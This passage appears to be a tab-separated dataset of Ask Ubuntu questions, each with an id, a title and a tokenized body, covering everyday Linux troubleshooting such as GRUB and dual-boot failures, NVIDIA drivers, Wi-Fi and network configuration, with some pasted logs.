406073	how do i enable firewall zones for networkmanager	i am trying to use the default network manager for ubuntu 13.10 to connect to networks . despite any config changes for example , enabling ufw , does not allow for the changing of this profile scheme . it is remains always faded as shown in the picture . in my experience with fedora , this similar network management style works right out of the box . is this firewall zone config meant for a different firewall and if so , which ? i 've tried googling for 'ubuntu networkmanager firewall zone ' but have n't gotten any relevant results . please advise , thanks .
406075	remove default entries from files ( nautilus ) quicklist in ubuntu 13.10	by default , when i right click on nautilus ( files ) icon ( in launcher ) , default places and my bookmarks are shown . is it possible to show just my custom bookmarks ? i am using ubuntu 13.10 .
406078	compatibility of ubuntu for phones	i just acquired a samsung galaxy nexus 1-515 32 gb . is ubuntu for phones compatible with this model ?
406079	how do i get passed the `` mbr-helper missing '' error message in installation ?	i 'm entirely new to linux/ubuntu so please bear with me . i currently have windows 7 32bit and wanted to install ubuntu . i used the installation off the website and copied it onto my bootable usb . as i installed ubuntu it says i need to reboot my system - so i did . as i try to boot up in ubuntu it just simply says 'mbr-helper missing ' and nothing else , however , it lets me boot back up in windows fine . is there a way to get around or repair this error ? i ca n't find a clear answer on forums . is this error because i copied it into my usb ? or is this a common yet fixable problem ? please help .
406081	installing swish++ from the source code	i 'm a linux beginner , so forgive me for such a stupid question . i have ubuntu 12.04 , and i need to install swish++ on it , the c++ version . i ca n't use apt-get install swish++ as it installs perl version , and moreover i must use the source code only ( i need it for my graduation work ) . i 've downloaded the archive from the official page of swish++ ( http : //swishplusplus.sourceforge.net ) . i read the install file , changed headers as it was written and i have no idea of what i should do after it . where should i run `` make '' command ? it will be perfect if someone has a step-by-step instruction for it . thanks in advance !
406085	ejabber admin web interface connectivity issue from amazon ec2 ami on local machine	i setup a amazon ec2 linux image ( ami ) and installed ejabber server on it .as it ( ami ) does not support admin web interface of ejabber on ami so i want to connect to ejabber server using local machine browser e.g : //ip : port/admin/ i am unable to connect but if i setup all the same on my local machine ejabber web admin console is accessable please help me
406091	are there any reliable sources with more frequent jdk icedtea package releases ?	i use the canonical repository for retrieving updates from the jdk icedtea , but it seems that it is lagging a lot behind what is supposed to be the latest stable version as per the icedtea website ( mine is 2.3.10 while the latest one is 2.4.3 from october ) . is there any other reliable repository from which i can get more recent icedtea packages for ubuntu 12.04 ?
406092	ca n't purge libapache2-mod-php5 , corrupt registry	i ca n't purge libapache2-mod-php5 . give me this error . ucfr : corrupt registry : duplicate entries for /etc/php5/apache2/php.ini libapache2-mod-php5 /etc/php5/apache2/php.ini libapache2-mod-php5 /etc/php5/apache2/php.ini the folder /etc/php5/ does n't exists .
406095	minecraft server issue ubuntu 12.04	i have minecraft server set up on an old dell p4 . i have port forwarded my local ip 192.168.1.36 on my router for port 25565 . when i go to a different internet ( not mine ) i put in my external ip e.g . 10x.7x.24x.3x:25565 but i cant connect to my server . i can connect on the local lan in the house ok . i have installed gufw ( ubuntu fire wall ) and allowed port 25565 incoming and outgoing . is there something i am missing i am using ubuntu 12.04 in all cases .
406096	how to create an external selfhealing btrfs usb hdd raid 1 array ?	the hardware is an external 2tb bus powered usb disk . what i want is a raid1 setup of 2x 1tb btrfs . is this possible ? how ? __ motivation the motivation for me to use raid1 btrfs is because i just read an article talking about how such a setup would repair corrupted files automatically when the checksum on one volume fails . example of what can happen with a .jpeg by just flipping one bit ( i used vim for this . : % ! xxd -b )
406097	where are the osd images for touchpad toggle in gnome ?	i want to edit the osd images for touchpad toggle on my notebook ( ubuntu 13.10 on asus zenbook ux31 ) , but i ca n't find where gnome is getting them from . they look like this : i thought i had found them under /usr/share/icons , but modifying these files ( and rebooting ) did n't make any change . wim @ wim-zenbook : /usr/share/icons $ find . -name `` *touchpad* '' ./highcontrast/256x256/status/touchpad-disabled.png ./highcontrast/256x256/devices/input-touchpad.png ./highcontrast/32x32/status/touchpad-disabled.png ./highcontrast/32x32/devices/input-touchpad.png ./highcontrast/22x22/status/touchpad-disabled.png ./highcontrast/22x22/devices/input-touchpad.png ./highcontrast/16x16/status/touchpad-disabled.png ./highcontrast/16x16/devices/input-touchpad.png ./highcontrast/24x24/status/touchpad-disabled.png ./highcontrast/24x24/devices/input-touchpad.png ./highcontrast/48x48/status/touchpad-disabled.png ./highcontrast/48x48/devices/input-touchpad.png ./gnome/32x32/devices/input-touchpad.png ./gnome/22x22/devices/input-touchpad.png ./gnome/16x16/devices/input-touchpad.png ./gnome/24x24/devices/input-touchpad.png ./gnome/scalable/status/touchpad-disabled-symbolic.svg ./gnome/scalable/devices/input-touchpad-symbolic.svg ./gnome/48x48/devices/input-touchpad.png
406101	matlab : two launcher icons	i followed the instructions in https : //help.ubuntu.com/community/matlab but still have two icons , one that starts a new matlab instance and one that refers to the running instance . this is what my /usr/share/applications/matlab.desktop looks like : [ desktop entry ] version=1.0 type=application terminal=false exec=matlab -desktop name=matlab icon=/usr/share/icons/hicolor/48x48/apps/matlab.png categories=development ; math ; science comment=scientific computing environment startupnotify=true startupwmclass=com-mathworks-util-postvminit
406102	boot problem after installing ubuntu 12.04.3 alongside windows 8 - only get to grub prompt	i tried to install ubuntu 12.4.03 ( 64bit ) alongside the pre-installed windows 8 ( 64bit ) from a live dvd . the hard drive is hp 110-13 eg desktop computer with intel core i3-324ot and nvidia geforce 705a graphic card . before installing i already made space for a ubuntu partition , then proceeded with the following strategy 1 ) turned off fast boot and disabled security boot . i think i enabled legacy boot ( which might have been a mistake i realized now ) . 2 ) run the live cd , first with the try ubuntu without installation option and then clicked on install ubuntu . 3 ) i choose the first option install alongside windows and had updates during the installation activated . the installation was successful and then i was asked to restart . the live disk was ejected and i pressed enter . 4 ) ubuntu generic did n't boot , i was left with a purple screen . 5 ) choosing windows to boot resulted in an error 6 ) i inserted the live disc and tried boot from it . i remember entering a system setting menu ( last option in the grub menu , where i could also choose among ubuntu , ubuntu recovery , windows , .. ) then i booted from sata and got back to try ubuntu . 7 ) i tried to install ubuntu again . got the message that there is windows 8 and ubuntu on my computer and chose the first option erase and reinstall ubuntu . resulted to be my second big mistake . 8 ) after the installation and the restart i did n't reach the grub menu , where i could choose from which os to boot but only a grub prompt and the message `minimal bash-like line editing is supported ... ' 9 ) typing ls resulted in : ( hd0 ) ( hd0 , gpt8 ) ( hd0 , gpt7 ) ( hd0 , gpt6 ) ( hd0 , gpt5 ) ( hd0 , gpt4 ) ( hd0 , gpt3 ) ( hd0 , gpt2 ) ( hd0 , gpt1 ) ( hd1 ) 10 ) ls ( hd0 , gpt2 ) results in : system efi 11 ) ls ( hd0 , gpt8 ) results in : ./ ../ lost+found/ etc/ media/ bin/ boot/ dev/ home/ lib/ lib64/ mnt/ opt/ proc/ root/ run/ sbin/ selinux/ srv/ sys/ tmp/ usr/ var/ initrd.img vmlinuz cdrom/ ( so i understand that this is my ubuntu partition ) 12 ) according to boot-repair sda4 is the partiton with windows and sda5 the one with windows recovery 13 ) if i type boot it results in : no loaded kernel . i do not know how to boot any os because i am new to linux . 14 ) if i insert the live disc and type `exit ' after grub > then i get the options : 1 ) try ubuntu 2 ) install ubuntu 3 ) check disc for errors . checking for errors results in : no errors found , press any key to reboot . then the same problem as in step 8 . 15 ) thus i can only boot ubuntu from the live disc ( option 1. from step 14 ) 16 ) if i run ubuntu from the disc and open the terminal and try to repair-boot , then i get the message : efi detected . please check the options . the link that repair boot generated for me is this one : http : //paste.ubuntu.com/6757167 i am new to linux and appreciate any help since i do n't know how to solve the problem ! sorry if this question has been asked before , i tried to find a solution but did n't succeed .
406105	dhclient.conf supersede stanzas ignored	i 'm putting the following lines at the top ( also tried the bottom ) of my dhclient.conf file : send host-name `` hostname '' ; supersede domain-name `` my-domain-name '' supersede domain-search `` my-domain-name '' supersede search `` my-domain-name '' nevertheless , my /etc/resolv.conf file is as follows : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 123.123.123.123 nameserver 123.123.123.123 search dhcp-supplied-domain-name i 've changed the domain names and ip addresses to protect my systems . how can i get this change to be reflected in my resolv.conf ?
406106	propietary nvidia driver kernel initialization error	brief summary : i installed nvidia proprietary drivers and at boot i see the splash screen and then it drops to the command line login screen . details : i am running kubuntu 13.10 and wanted to install nvidias proprietary drivers . i added ppa : xorg-edgers and installed nvidia 331 drivers . after a reboot kde is not starting . the splash screen is shown and then it drops to the command line login prompt . things i tried : 1 ) uninstall ppa using ppa-purge and reboot - > no change 2 ) uninstall nvidia drivers using apt-get purge nvidia* , checking that dkms did not list any nvidia modules , then reinstall everything cf . http : //askubuntu.com/a/225763/236251 - > no change 3 ) blacklist nvidia drivers and use nouveau drivers - > no change ( although i am not entirely sure that i did everything correctly here ) 4 ) use jockey-text ( sudo jockey-text -l and sudo jockey-text -e .. ) to install or disable the nvidia divers 5 ) reinstall ppa : xorg-edgers and reinstall nvidia 331 - > no change question : what i am looking for is ideally to get the nvidia drivers up and running but simply reverting my changes would also make me very happy ! any help is highly appreciated . system details : cat /proc/version linux version 3.11.0-15-generic ( buildd @ batsu ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) ) # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 lspci | grep vga 03:00.0 vga compatible controller : nvidia corporation g96gl [ quadro fx 580 ] ( rev a1 ) here is the relevant section in xorg.0.log [ 18.736 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 18.736 ] ( ii ) `` glx '' will be loaded by default . [ 18.736 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 18.736 ] ( ii ) loadmodule : `` glx '' [ 18.806 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 20.048 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 20.048 ] compiled for 4.0.2 , module version = 1.0.0 [ 20.048 ] module class : x.org server extension [ 20.048 ] ( ii ) nvidia glx module 304.117 tue nov 26 21:45:09 pst 2013 [ 20.048 ] loading extension glx [ 20.048 ] ( ii ) loadmodule : `` nvidia '' [ 20.048 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 20.239 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 20.239 ] compiled for 4.0.2 , module version = 1.0.0 [ 20.239 ] module class : x.org video driver [ 20.250 ] ( ii ) nvidia dlloader x driver 304.117 tue nov 26 21:27:08 pst 2013 [ 20.250 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 20.251 ] ( ++ ) using vt number 7 [ 20.253 ] ( ii ) loading sub module `` fb '' [ 20.253 ] ( ii ) loadmodule : `` fb '' [ 20.280 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 20.293 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 20.293 ] compiled for 1.14.5 , module version = 1.0.0 [ 20.293 ] abi class : x.org ansi c emulation , version 0.4 [ 20.293 ] ( ii ) loading sub module `` wfb '' [ 20.293 ] ( ii ) loadmodule : `` wfb '' [ 20.294 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 20.300 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 20.300 ] compiled for 1.14.5 , module version = 1.0.0 [ 20.300 ] abi class : x.org ansi c emulation , version 0.4 [ 20.300 ] ( ii ) loading sub module `` ramdac '' [ 20.300 ] ( ii ) loadmodule : `` ramdac '' [ 20.300 ] ( ii ) module `` ramdac '' already built-in [ 20.303 ] ( * ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 20.303 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 20.303 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 20.303 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 20.303 ] ( * ) nvidia ( 0 ) : enabling 2d acceleration [ 20.324 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 20.324 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 20.324 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 20.324 ] ( ee ) nvidia ( 0 ) : * * * aborting * * * [ 20.324 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 20.324 ] ( ii ) unloadmodule : `` nvidia '' [ 20.324 ] ( ii ) unloadsubmodule : `` wfb '' [ 20.324 ] ( ii ) unloadsubmodule : `` fb '' [ 20.324 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 20.324 ] ( ee ) fatal server error : [ 20.324 ] ( ee ) no screens found ( ee ) [ 20.324 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 20.324 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for > additional information . [ 20.324 ] ( ee ) [ 20.325 ] ( ee ) server terminated with error ( 1 ) . closing log file .
406111	what is the command in the terminal to update vim on ubuntu ?	i 'm on ubuntu 12.04 and want to know how do you update vim via the command line . what is the command to update this ?
406115	custom keyboard shortcut not working	i want a keyboard shortcut to mute my system microphones unless i 'm on a conference call or something and want it to be on . it would n't be ideal - i wish it were system wide with an indicator with a clear icon of whether that hardware is in use ( webcams too ! ) , but this keyboard shortcut is an immediate measure . unfortunately , this keyboard shortcut ( ctrl+audio mute ) seems to have no effect . if i run the command from terminal , it works but just not as a keyboard shortcut . if i change the keystroke to something more standard ( ctrl+m ) it also does n't work ( my keyboard has an audio mute key that this control panel did detect itself ) . there 's no error shown . in my particular case , i 'm using livemeeting inside a virtualbox windows machine . i 'm using the basic audio settings , not some special vm-dedicated usb mic - just the standard built in mic . whatever the solution , i hope it will take into account all the various microphones ! my external webcam has a mic , but i do n't use it ever - instead i have a usb mic that i like , and then there 's the built-in mic . i want to know that none of them are listening ! thanks ! update also , if i try to map ctrl+audio mute or ctrl+m to gnome-calculator it does not work . so for me this appears to be a problem with the keyboard shortcuts generally . i also notice that my built-in keybindings are not always reliable . especially scary when i 'm in virtualbox and either the virtualbox hostkey functionality does n't work or the ctrl+shift+ [ arrow ] does n't work to switch workspaces . have n't made a guess as to which yet - this one seems to happen when i 've left the computer idle for some time . futher , i 've noticed that alt+ctrl+t for the terminal is unreliable ( regardless of virtualbox ) . sometimes it works , sometimes nothing happens . if this normal ? is this just the state of linux/ubuntu/unity at this time and i need to be prepared for these annoyances ? fyi i 'm running a system76 machine so all the core hardware is as compatible as it can be , right ? i also tried using compiz instead but that did n't work either .
406118	logging out from ubuntu takes too long	when i first had only unity as a desktop manager , i did n't need to log out so i 'm not sure if this issue has been around before . i 'm say so because it 's important to know that i currently have xfce 4.12 installed . i 'm still experimenting so i 'm logging out\in a lot . when i logout , i see the following message : * starting lightdm display manager * stopping send an event to indicate plymouth is up * starting startpar bridge for notification of upstart job start/stop * stopping startpar bridge for notification of upstart job start/stop * starting mount network filesystems * stopping mount network filesystems * starting startpar bridge for notification of upstart job start/stop * stopping startpar bridge for notification of upstart job start/stop would someone please : 1 . explain what does these messages mean ? 2 . why is logging out taking too much time ? 3 . when i start ubuntu , it take too much longer than what it would take to start ubuntu on virtualbox ! could this be related to these messages ?
406119	how to change gedit action for url drag from firefox ( link copy instead of downloading source code ) ?	what i want to do is from firefox drag the desired link to a gedit window and let the url be pasted instead of downloading a source code ( as now gedit does ) . actually i 'd appreciate any faster way to copy url than from a browser than right click on a link - > copy option - > change window to gedit - > ctrl + v. that is a lot of work when repeated . a simple drag would be great . i have sadly failed to find an answer in google or in gedit plugins .
406120	ca n't copy/move anything to external drive	i bought a lacie 3tb drive while it was on sale to replace a seagate 2tb drive and formatted it to ext3 . no mater what way i set up the partitions in gparted ( 3tb/1tb+2tb ) i never am able to move anything onto the drive . i 've tried checking it for errors but it returns with no issues .
406122	wireless internet connection wont work on dell n4010 on ubuntu 12.04.3	i just recently installed ubuntu on my dell n4010 but i can not connect to the internet with wifi . i was wondering if anyone can help me with this problem .
406123	local and cloud copy of folder out of synch	i have ubuntu one on multiple machines : one machine is running xubuntu 13.04 and the other lubuntu 13.10 ... i know of at least one folder on the lubuntu machine that is out of synch with the copy on the xubuntu machine and the cloud . i would rather not switch to stock ubuntu as i find unity counter-productive . i would rather not install nautilus as i 'm trying to run as lean a system as possible . any advice ?
406124	how to make ubuntu 12.04 server bootable again ?	i just began taking a digital forensics course on campus , and thought having kali linux would be a good tool to familiarize myself . my computer has two separate hard drives , one for ubuntu server 12.04 ( home voip and sandbox ) and the other for kali . however , upon finishing the install , the grub was installed to the mbr of the first hard drive ( the one housing ubuntu ) . now when i boot up the machine , the grub only shows kali linux ( aside from the kali recovery mode , memtest , etc ) any help on getting ubuntu server bootable again ? thanks .
406126	why is ifup not running all of the if-pre-up.d scripts ?	$ ll /etc/network/if-pre-up.d/ total 20 drwxr-xr-x 2 root root 4096 jan 15 16:43 ./ drwxr-xr-x 7 root root 4096 jan 14 21:29 ../ -rwxr-xr-x 1 root root 344 apr 28 2012 ethtool* -rwxr-xr-x 1 root root 158 jan 14 22:01 iptablesload.sh* -rwxr-xr-x 1 root root 3839 may 3 2012 wireless-tools* lrwxrwxrwx 1 root root 32 dec 4 13:00 wpasupplicant - > ../../wpa_supplicant/ifupdown.sh* $ sudo ifup -- all -v run-parts -- verbose /etc/network/if-pre-up.d run-parts : executing /etc/network/if-pre-up.d/ethtool run-parts : executing /etc/network/if-pre-up.d/wireless-tools run-parts : executing /etc/network/if-pre-up.d/wpasupplicant run-parts -- verbose /etc/network/if-up.d run-parts : executing /etc/network/if-up.d/000resolvconf run-parts : executing /etc/network/if-up.d/avahi-autoipd run-parts : executing /etc/network/if-up.d/avahi-daemon run-parts : executing /etc/network/if-up.d/ethtool run-parts : executing /etc/network/if-up.d/ntpdate run-parts : executing /etc/network/if-up.d/openssh-server run-parts : executing /etc/network/if-up.d/upstart run-parts : executing /etc/network/if-up.d/wpasupplicant why is iptablesload.sh not being run ? is there some other location where a list of pre-up scripts is set ?
406129	trouble with dual booting windows 8 and ubuntu 13.04	so i 've been trying to get a dual boot set up . the problem is that ubuntu does n't detect windows 8 during installation making my only options erase the whole drive or partition manually . i sectioned off about half the drive ( 350gb ) , but whenever i tell it to use that portion it tells me it has no root driver . so my issue could probably be fixed two ways : 1 ) help me get ubuntu to recognize that the system already has an os . or 2 ) help me figure out why it is n't using the 350gb to partition . thanks !
406134	can i partition my ubuntu drive to also install bootable os x ?	i currently have ubuntu 13.10 running on a 500gb hdd with 4gb ram and i was wondering if i could partition the hard drive to also download os x ( snow leopard or mountain lion ) and then upon booting up i can choose which os to boot into .
406135	how to use pygmentize automatically with less	i found pygmentize thanks to this answer , but it would be great if it could be used to highlight text with less or maybe replace the command . is there a way to do that ? thanks in advance .
406137	preinstalled ubuntu 12.04 on dell inspiron one 19 wo n't get past grub	have a hard drive with ubuntu 12.04 installed which boots my school 's pc and works on my old gateway laptop with a hdd dock , but when i try and use my dock on my desktop dell all-in-one ( inspiron one 19 ) boot takes me to a grub command line saying minimal bash like blah blah blah press tab blah blah blah ... i 've seen many people with this problem but have n't seen a way to fix it without live cd . can i ?
406147	remove workspace ubuntu 12.04lts	i 'm using ubuntu 12.04 lts and want to remove workspace from gnome panel 1- tried to use my unity but it was 3d and my os using 2d . 2- tried to find or install unity-tweak-tool but i ca n't find it . 3- tried to find it in appearance below behavior but not found . any help
406148	what program will change avi files into files i can burn on k3b to burn dvds ?	i have avi files that are videos . im am looking to burn these movies onto a dvd-r . it only burns as data to the disc if i burn it directly . so im wondering what program will convert these avi files to burnable files to watch on dvd player ?
406149	how to keybind the `` open terminal here '' command in thunar	i looked and found this . that is my question except i want to do it in thunar .
406150	can not boot in either os after install ( windows 8 or ubuntu ) . acer aspire	http : //paste.ubuntu.com/6759489/ please help ! i have installed ubuntu 13.10 and now i can not reboot in any os . i wanted to set up the system boot in either windows 8 or ubuntu . followed the instructions by uefi-community and it still did not work . i have also tried countless troubleshooting suggestions on the forum . i did notice during install that i did not see an option to `` run ubuntu alongside windows 8 '' . i chose `` something else '' anyway . i have run all the suggested boot repairs but i am making no progress . i also partitioned my hd , prior to installation , in windows and installed to that location ( sda7 ) . please help
406155	how can i get a list of the biggest packages currently installed in order ?	i am running out of disk space on my root partition , and i 'm attempting to remove some packages and not others .
406161	how to download an entire website where login is required ?	how can i get the entire website when i have to login there to see the content ? i tried to use webhttrack but ca n't use it if the website requires a login with forms .
406163	wifi not working with ubuntu 12	i 'm a brand new to linux coming from windows . i 'm soon to be enrolling in a cs class and thought i should get some hands on experience with linux . so with this being said , i hope i illustrated that i 'm not expert with ubuntu . the problem i just recently installed ubuntu 12 and ca n't seem to establish an internet connection . i clicked the little internet icon on the top right of my screen , and it did not show any local routers or anything whatsoever . i already `` googled '' about this problem , but i keep seeing the usage of commands in the terminal to `` update '' and so forth . problem is , i ca n't update because i do n't have any connection at all . i also read some articles talking about installing drivers , but again , i have absolutely no internet connection . like i previously stated before , i 'm brand new to ubuntu , and i could use some help . thanks !
406164	slight choppiness in video playback ubuntu 13.10	i 've read a lot of these and i 've tried updating to the latest nvidia drivers ( nvidia 331 , i have a gtx 460 ) , got vlc , made sure hardware decoding is enabled , but nothing seems to fix it . the most irritating part is that i had smooth video playback when i first installed ubuntu , this only happened a few weeks later , and i honestly can not remember what i did to cause it . it 's not even on some very demanding videos either , it 's just regular stuff . the symptom itself is , just a momentary pause in video playback every few seconds or so . it 'll freeze for like a half a second , but the audio will be fine . it does n't lose sync or anything either , it 's just a temporary freeze , but i can detect it . i 'd like to say that nothing else does this , but actually i 'm sensing a tiny bit of the same thing with my typing right now . it 'll be fine for awhile , and then a bit of lag . there does n't appear to e any spikes in cpu usage or anything to explain or justify it either . there 's plenty of free memory too . i 'm completely stumped .
406166	how can i configure my headless server to connect to a wireless network automatically ?	i 'm setting up a headless server , but i do n't have ethernet access where i want to put it , so i need it to automatically connect to my wifi network when it boots up ( it has a wireless card ) . i can connect to an ethernet connection to set it up , but i need it to automatically connect to my access point from then on . how can i configure this ?
406169	can i use ubuntu installers partition tool ( win 8.1 and ubuntu 13.04 )	i have laptop less than year old with preinstalled windows 8 ( now updated to 8.1 ) . i 'd like to install ubuntu alongside with windows , i have read many instructions on web and watched tutorials on youtube , but still one question remains . i have hp laptop , with 'local disk ( c : ) ' and 'recovery ( d : ) ' . i would like to avoid manual partitioning because i do n't have the confidence to mess with that : ) . i 've seen in the instructions on web that i could use the 'install alongside windows ' option and it would create the partitions automatically , but all the examples are having windows with only c : disk . so the question is : will it make any difference to have also the d : disk ? can i use the 'install alongside windows ' option ? ( i 've booted my laptop already from liveusb and selected the try ubuntu , and checked that i had the 'install alongside windows ' option visible , just did n't have the guts to do it then : ) .. )
406176	how to remove kernel installed using dpkg command ?	i am using i386 architecture of ubuntu 12.04 , i downloaded latest kernel 3.12.7 from http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.12.7-trusty/ & installed it using dpkg -i . installation was all good , but after 40-50 minutes it freezes . so , i would like to revert changes . how to uninstall the latest kernel 3.12.7 which i downloaded using dpkg command ? here 's my `dpkg -l | grep `` linux- [ a-z ] *- ''
406177	2 hard disks for 2 systems	can i have 1 hard disk for ubuntu and another for windows . i have to use software for both systems . i know virtual box can do the same thing , but it is very slow for my computer . so is it possible . if yes , how to implement ? any suggestion will be appreciated . thank you !
406178	read only file system ?	i 'm running a kernel of ubuntu on my acer chromebook and i put some music on my mp3 and it worked fine . next time i try it says error opening file : read only file system . i am so confused any help would be appreciated ! when i run dmesg i get this . [ 0.235869 ] pci_bus 0000:00 : resource 11 [ mem 0x000d4000-0x000d7fff ] [ 0.235874 ] pci_bus 0000:00 : resource 12 [ mem 0x000d8000-0x000dbfff ] [ 0.235878 ] pci_bus 0000:00 : resource 13 [ mem 0x000dc000-0x000dffff ] [ 0.235882 ] pci_bus 0000:00 : resource 14 [ mem 0x000e0000-0x000e3fff ] [ 0.235886 ] pci_bus 0000:00 : resource 15 [ mem 0x000e4000-0x000e7fff ] [ 0.235890 ] pci_bus 0000:00 : resource 16 [ mem 0x000e8000-0x000ebfff ] [ 0.235894 ] pci_bus 0000:00 : resource 17 [ mem 0x000ec000-0x000effff ] [ 0.235898 ] pci_bus 0000:00 : resource 18 [ mem 0x000f0000-0x000fffff ] [ 0.235902 ] pci_bus 0000:00 : resource 19 [ mem 0x7ea00001-0xfebfffff ] [ 0.235906 ] pci_bus 0000:00 : resource 20 [ mem 0xfed40000-0xfed44fff ] [ 0.235911 ] pci_bus 0000:01 : resource 1 [ mem 0xe0400000-0xe04fffff ] [ 0.235915 ] pci_bus 0000:02 : resource 1 [ mem 0xe0600000-0xe06fffff ] [ 0.235920 ] pci_bus 0000:02 : resource 2 [ mem 0xe0500000-0xe05fffff 64bit pref ] [ 0.235998 ] net : registered protocol family 2 [ 0.236084 ] ip route cache hash table entries : 65536 ( order : 7 , 524288 bytes ) [ 0.236355 ] tcp established hash table entries : 262144 ( order : 10 , 4194304 bytes ) [ 0.237661 ] tcp bind hash table entries : 65536 ( order : 9 , 2097152 bytes ) [ 0.238732 ] tcp : hash tables configured ( established 262144 bind 65536 ) [ 0.238737 ] tcp : reno registered [ 0.238748 ] udp hash table entries : 1024 ( order : 4 , 98304 bytes ) [ 0.238799 ] udp-lite hash table entries : 1024 ( order : 4 , 98304 bytes ) [ 0.238953 ] net : registered protocol family 1 [ 0.238994 ] pci 0000:00:02.0 : boot video device [ 0.239164 ] pci : cls 64 bytes , default 64 [ 0.239236 ] pci-dma : using software bounce buffering for io ( swiotlb ) [ 0.239241 ] placing 64mb software io tlb between ffff880075800000 - ffff880079800000 [ 0.239245 ] software io tlb at phys 0x75800000 - 0x79800000 [ 0.240192 ] microcode : cpu0 sig=0x206a7 , pf=0x10 , revision=0x28 [ 0.240203 ] microcode : cpu1 sig=0x206a7 , pf=0x10 , revision=0x28 [ 0.240246 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 0.244120 ] msgmni has been set to 3742 [ 0.244550 ] block layer scsi generic ( bsg ) driver version 0.4 loaded ( major 253 ) [ 0.244555 ] io scheduler noop registered [ 0.244559 ] io scheduler deadline registered [ 0.244645 ] io scheduler cfq registered ( default ) [ 0.244822 ] pcieport 0000:00:1c.0 : irq 40 for msi/msi-x [ 0.245041 ] pcieport 0000:00:1c.1 : irq 41 for msi/msi-x [ 0.245211 ] pcieport 0000:00:1c.0 : signaling pme through pcie pme interrupt [ 0.245215 ] pci 0000:01:00.0 : signaling pme through pcie pme interrupt [ 0.245224 ] pcie_pme 0000:00:1c.0 : pcie01 : service driver pcie_pme loaded [ 0.245258 ] pcieport 0000:00:1c.1 : signaling pme through pcie pme interrupt [ 0.245262 ] pci 0000:02:00.0 : signaling pme through pcie pme interrupt [ 0.245266 ] pci 0000:02:00.1 : signaling pme through pcie pme interrupt [ 0.245274 ] pcie_pme 0000:00:1c.1 : pcie01 : service driver pcie_pme loaded [ 0.245299 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 0.245336 ] pciehp : pci express hot plug controller driver version : 0.4 [ 0.245905 ] acpi : ac adapter [ ac ] ( on-line ) [ 0.246267 ] input : lid switch as /devices/lnxsystm:00/device:00/pnp0c0d:00/input/input0 [ 0.246426 ] acpi : lid switch [ lid0 ] [ 0.246504 ] input : power button as /devices/lnxsystm:00/device:00/pnp0c0c:00/input/input1 [ 0.246511 ] acpi : power button [ pwrb ] [ 0.246590 ] input : sleep button as /devices/lnxsystm:00/device:00/pnp0c0e:00/input/input2 [ 0.246596 ] acpi : sleep button [ tpad ] [ 0.246678 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input3 [ 0.246684 ] acpi : power button [ pwrf ] [ 0.247251 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input4 [ 0.247260 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 0.247310 ] acpi : requesting acpi_cpufreq [ 0.247656 ] monitor-mwait will be used to enter c-1 state [ 0.247690 ] monitor-mwait will be used to enter c-2 state [ 0.247723 ] monitor-mwait will be used to enter c-3 state [ 0.247748 ] acpi : acpi_idle registered with cpuidle [ 0.253186 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 0.253191 ] acpi : thermal zone [ thrm ] ( 0 c ) [ 0.256219 ] non-volatile memory driver v1.3 [ 0.256292 ] linux agpgart interface v0.103 [ 0.256394 ] agpgart-intel 0000:00:00.0 : intel sandybridge chipset [ 0.256537 ] agpgart-intel 0000:00:00.0 : detected gtt size : 2097152k total , 262144k mappable [ 0.257691 ] agpgart-intel 0000:00:00.0 : detected 32768k stolen memory [ 0.257951 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000 [ 0.258204 ] tpm_tis tpm_tis : 1.2 tpm ( device-id 0xfe , rev-id 71 ) [ 0.265869 ] [ firmware bug ] : battery : ( dis ) charge rate invalid . [ 0.265938 ] acpi : battery slot [ batx ] ( battery present ) [ 0.301023 ] [ drm ] initialized drm 1.1.0 20060810 [ 0.301425 ] i915 0000:00:02.0 : setting latency timer to 64 [ 0.372248 ] i915 0000:00:02.0 : irq 42 for msi/msi-x [ 0.372264 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 0.372268 ] [ drm ] driver supports precise vblank timestamp query . [ 0.698271 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 0.794057 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 1.097818 ] console : switching to colour frame buffer device 170x48 [ 1.105005 ] fb0 : inteldrmfb frame buffer device [ 1.105007 ] drm : registered panic notifier [ 1.105022 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 1.106170 ] loop : module loaded [ 1.106246 ] ahci 0000:00:1f.2 : version 3.0 [ 1.106332 ] ahci 